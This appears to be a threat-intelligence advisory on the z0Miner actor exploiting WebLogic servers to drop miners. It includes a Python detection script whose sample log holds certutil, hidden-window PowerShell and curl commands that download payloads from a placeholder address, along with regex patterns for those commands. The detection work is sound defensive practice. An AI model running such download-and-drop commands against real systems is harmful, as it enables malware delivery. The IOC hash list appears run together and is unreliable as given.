z0Miner Exploits Korean Web Servers to Attack WebLogic Server

AhnLab Security Intelligence Center (ASEC) has found numerous cases of threat actors attacking vulnerable Korean servers. This post introduces one of the recent cases, in which the threat actor ‘z0Miner’ attacked Korean WebLogic servers. z0Miner was first reported by Tencent Security, a Chinese Internet service provider. This threat actor has a history of distributing miners to vulnerable servers (Atlassian Confluence, Apache ActiveMQ, Log4J, etc.) and has been mentioned frequently on the ASEC blog. It is also well known for exploiting CVE-2020-14882 and CVE-2020-14883 to attack WebLogic servers.

On January 26, 2024, AhnLab found cases in which z0Miner distributed malware to Korean WebLogic server systems. The method used to download the malicious files differed by operating system: on Windows the threat actor used powershell.exe and certutil.exe, and on Linux the curl command.
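The per-OS download primitives named above (certutil.exe and powershell.exe on Windows, curl on Linux) are a natural detection hook: on a WebLogic host, a download utility spawned directly by the server's java process is unusual. The script below is an added example written for this page, not code from ASEC or from the X-Force advisory. It assumes a simple pipe-delimited process-creation record (timestamp, host, parent image, image, command line), which is a placeholder layout rather than any real Sysmon or auditd format, and the sample records, host names, paths and the 198.51.100.7 address are all constructed. The regexes are this example's own patterns, not indicators from the advisory.

```python
import re
from dataclasses import dataclass
from typing import Optional


@dataclass
class ProcessEvent:
    timestamp: str
    host: str
    parent_image: str
    image: str
    command_line: str


# Assumption: WebLogic managed servers run as a java process, so a download
# utility whose direct parent is java is worth an alert. Tune for your estate.
WEBLOGIC_PARENT_NAMES = {"java", "java.exe"}

# Detection patterns for the three download primitives the advisory names.
# These regexes are this example's own and are not taken from the advisory.
DOWNLOAD_PATTERNS = {
    "certutil": re.compile(r"\bcertutil(?:\.exe)?\b.*?[-/]urlcache\b", re.I),
    "powershell": re.compile(
        r"\bpowershell(?:\.exe)?\b.*?"
        r"(?:downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer)",
        re.I,
    ),
    # curl only counts when it writes to disk or pipes into a shell; a plain
    # health-check request to the console port should not fire.
    "curl": re.compile(
        r"\bcurl\b.*?(?:\s-o\b|\s-O\b|--output\b|\|\s*(?:ba)?sh\b)", re.I
    ),
}


def basename(path: str) -> str:
    """Last path component for either Windows or POSIX paths, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_line(line: str) -> Optional[ProcessEvent]:
    """Parse one pipe-delimited record; the command line may itself contain '|'."""
    parts = line.split("|", 4)
    if len(parts) != 5:
        return None
    return ProcessEvent(*(p.strip() for p in parts))


def classify(event: ProcessEvent) -> Optional[str]:
    """Name the matched download primitive, or None if the event is not suspicious."""
    if basename(event.parent_image) not in WEBLOGIC_PARENT_NAMES:
        return None
    for name, pattern in DOWNLOAD_PATTERNS.items():
        if pattern.search(event.command_line):
            return name
    return None


def scan(log_text: str):
    """Return (host, primitive, command_line) for every suspicious record."""
    hits = []
    for line in log_text.strip().splitlines():
        event = parse_line(line)
        if event is None:
            continue
        primitive = classify(event)
        if primitive:
            hits.append((event.host, primitive, event.command_line))
    return hits


# Constructed sample records (timestamp|host|parent image|image|command line).
# Hosts, paths and the 198.51.100.7 address are made-up documentation values.
SAMPLE_LOG = r"""
2024-01-26T10:02:11Z|web01|C:\Oracle\jdk\bin\java.exe|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://198.51.100.7/payload.exe C:\Windows\Temp\payload.exe
2024-01-26T10:02:14Z|web01|C:\Oracle\jdk\bin\java.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -c "Invoke-WebRequest -Uri http://198.51.100.7/payload.exe -OutFile C:\Windows\Temp\payload.exe"
2024-01-26T10:03:40Z|web02|/usr/lib/jvm/java-11/bin/java|/usr/bin/curl|curl -fsSL http://198.51.100.7/payload.sh -o /tmp/payload.sh
2024-01-26T10:05:02Z|web02|/usr/lib/jvm/java-11/bin/java|/usr/bin/curl|curl -sI http://127.0.0.1:7001/console
2024-01-26T10:06:30Z|web01|C:\Windows\explorer.exe|C:\Windows\System32\certutil.exe|certutil.exe -verify C:\certs\server.cer
"""

if __name__ == "__main__":
    for host, primitive, cmd in scan(SAMPLE_LOG):
        print(f"[{host}] {primitive}: {cmd}")
```

Run against the constructed log, the first three records fire (certutil, PowerShell and curl downloads spawned by java) while the local health check and the certutil invocation under explorer.exe do not. The parent-process constraint is what keeps the rule quiet on ordinary administrative use of these tools; if your WebLogic processes run under a wrapper or a different JVM binary name, extend WEBLOGIC_PARENT_NAMES accordingly.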

Disclaimer: This article is part of X-Force OSINT Advisories’ automated collection to enable faster integration of open-source articles to client environments. All credit and copyright goes to the original authors.

Reference: https://asec.ahnlab.com/en/62564/

Sample Indicators of Compromise:

efc2a705c858ed08a76d20a8f5a11b1b2a0d26b8b02bb2d17994d2a9a38d61db547c02a9b01194a0fcbfef79aaa52e38575575f5b6f9c4f7149ed6d86fb16c0fa0766ad196626f28919c904d2ced6c85
